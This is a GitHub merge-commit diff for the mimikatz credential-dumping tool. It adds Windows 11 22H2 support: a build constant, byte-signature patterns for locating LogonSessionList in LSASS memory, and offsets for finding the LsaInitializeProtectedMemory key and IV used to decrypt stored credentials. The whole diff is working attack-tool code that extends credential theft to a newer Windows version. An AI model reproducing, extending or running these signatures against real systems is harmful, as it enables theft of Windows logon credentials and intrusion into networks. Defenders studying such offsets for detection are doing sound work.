Merge pull request #432 from SLiNv/master

Added Windows 11's Structure offset and updated key+IV offset for decryption
This commit is contained in:
Benjamin DELPY 2023-11-09 23:47:40 +01:00 committed by GitHub
commit ac143b45a5
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
3 changed files with 4 additions and 0 deletions

View File

@ -120,6 +120,7 @@ DWORD MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NU
#define KULL_M_WIN_BUILD_10_20H2 19042 #define KULL_M_WIN_BUILD_10_20H2 19042
#define KULL_M_WIN_BUILD_10_21H2 19044 #define KULL_M_WIN_BUILD_10_21H2 19044
#define KULL_M_WIN_BUILD_2022 20348 #define KULL_M_WIN_BUILD_2022 20348
#define KULL_M_WIN_BUILD_11_22H2 22621
#define KULL_M_WIN_MIN_BUILD_XP 2500 #define KULL_M_WIN_MIN_BUILD_XP 2500
#define KULL_M_WIN_MIN_BUILD_2K3 3000 #define KULL_M_WIN_MIN_BUILD_2K3 3000

View File

@ -20,6 +20,7 @@ KULL_M_PATCH_GENERIC PTRN_WIN8_LsaInitializeProtectedMemory_KeyRef[] = { // Init
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WIN8_LsaInitializeProtectedMemory_KEY), PTRN_WIN8_LsaInitializeProtectedMemory_KEY}, {0, NULL}, {62, -70, 23}}, {KULL_M_WIN_BUILD_8, {sizeof(PTRN_WIN8_LsaInitializeProtectedMemory_KEY), PTRN_WIN8_LsaInitializeProtectedMemory_KEY}, {0, NULL}, {62, -70, 23}},
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WN10_LsaInitializeProtectedMemory_KEY), PTRN_WN10_LsaInitializeProtectedMemory_KEY}, {0, NULL}, {61, -73, 16}}, {KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WN10_LsaInitializeProtectedMemory_KEY), PTRN_WN10_LsaInitializeProtectedMemory_KEY}, {0, NULL}, {61, -73, 16}},
{KULL_M_WIN_BUILD_10_1809, {sizeof(PTRN_WN10_LsaInitializeProtectedMemory_KEY), PTRN_WN10_LsaInitializeProtectedMemory_KEY}, {0, NULL}, {67, -89, 16}}, {KULL_M_WIN_BUILD_10_1809, {sizeof(PTRN_WN10_LsaInitializeProtectedMemory_KEY), PTRN_WN10_LsaInitializeProtectedMemory_KEY}, {0, NULL}, {67, -89, 16}},
{KULL_M_WIN_BUILD_11_22H2, {sizeof(PTRN_WN10_LsaInitializeProtectedMemory_KEY), PTRN_WN10_LsaInitializeProtectedMemory_KEY}, {0, NULL}, {71, -89, 16}},
}; };
#elif defined _M_IX86 #elif defined _M_IX86
BYTE PTRN_WALL_LsaInitializeProtectedMemory_KEY[] = {0x6a, 0x02, 0x6a, 0x10, 0x68}; BYTE PTRN_WALL_LsaInitializeProtectedMemory_KEY[] = {0x6a, 0x02, 0x6a, 0x10, 0x68};

View File

@ -19,6 +19,7 @@ BYTE PTRN_WN6x_LogonSessionList[] = {0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0
BYTE PTRN_WN1703_LogonSessionList[] = {0x33, 0xff, 0x45, 0x89, 0x37, 0x48, 0x8b, 0xf3, 0x45, 0x85, 0xc9, 0x74}; BYTE PTRN_WN1703_LogonSessionList[] = {0x33, 0xff, 0x45, 0x89, 0x37, 0x48, 0x8b, 0xf3, 0x45, 0x85, 0xc9, 0x74};
BYTE PTRN_WN1803_LogonSessionList[] = {0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc9, 0x74}; BYTE PTRN_WN1803_LogonSessionList[] = {0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc9, 0x74};
BYTE PTRN_WN11_LogonSessionList[] = {0x45, 0x89, 0x34, 0x24, 0x4c, 0x8b, 0xff, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x74}; BYTE PTRN_WN11_LogonSessionList[] = {0x45, 0x89, 0x34, 0x24, 0x4c, 0x8b, 0xff, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x74};
BYTE PTRN_WN11_22H2_LogonSessionList[] = {0x45, 0x89, 0x37, 0x4c, 0x8b, 0xf7, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x0f, 0x84};
KULL_M_PATCH_GENERIC LsaSrvReferences[] = { KULL_M_PATCH_GENERIC LsaSrvReferences[] = {
{KULL_M_WIN_BUILD_XP, {sizeof(PTRN_WIN5_LogonSessionList), PTRN_WIN5_LogonSessionList}, {0, NULL}, {-4, 0}}, {KULL_M_WIN_BUILD_XP, {sizeof(PTRN_WIN5_LogonSessionList), PTRN_WIN5_LogonSessionList}, {0, NULL}, {-4, 0}},
{KULL_M_WIN_BUILD_2K3, {sizeof(PTRN_WIN5_LogonSessionList), PTRN_WIN5_LogonSessionList}, {0, NULL}, {-4, -45}}, {KULL_M_WIN_BUILD_2K3, {sizeof(PTRN_WIN5_LogonSessionList), PTRN_WIN5_LogonSessionList}, {0, NULL}, {-4, -45}},
@ -31,6 +32,7 @@ KULL_M_PATCH_GENERIC LsaSrvReferences[] = {
{KULL_M_WIN_BUILD_10_1803, {sizeof(PTRN_WN1803_LogonSessionList), PTRN_WN1803_LogonSessionList}, {0, NULL}, {23, -4}}, {KULL_M_WIN_BUILD_10_1803, {sizeof(PTRN_WN1803_LogonSessionList), PTRN_WN1803_LogonSessionList}, {0, NULL}, {23, -4}},
{KULL_M_WIN_BUILD_10_1903, {sizeof(PTRN_WN6x_LogonSessionList), PTRN_WN6x_LogonSessionList}, {0, NULL}, {23, -4}}, {KULL_M_WIN_BUILD_10_1903, {sizeof(PTRN_WN6x_LogonSessionList), PTRN_WN6x_LogonSessionList}, {0, NULL}, {23, -4}},
{KULL_M_WIN_BUILD_2022, {sizeof(PTRN_WN11_LogonSessionList), PTRN_WN11_LogonSessionList}, {0, NULL}, {24, -4}}, {KULL_M_WIN_BUILD_2022, {sizeof(PTRN_WN11_LogonSessionList), PTRN_WN11_LogonSessionList}, {0, NULL}, {24, -4}},
{KULL_M_WIN_BUILD_11_22H2, {sizeof(PTRN_WN11_22H2_LogonSessionList), PTRN_WN11_22H2_LogonSessionList}, {0, NULL}, {27, -4}},
}; };
#elif defined(_M_IX86) #elif defined(_M_IX86)
BYTE PTRN_WN51_LogonSessionList[] = {0xff, 0x50, 0x10, 0x85, 0xc0, 0x0f, 0x84}; BYTE PTRN_WN51_LogonSessionList[] = {0xff, 0x50, 0x10, 0x85, 0xc0, 0x0f, 0x84};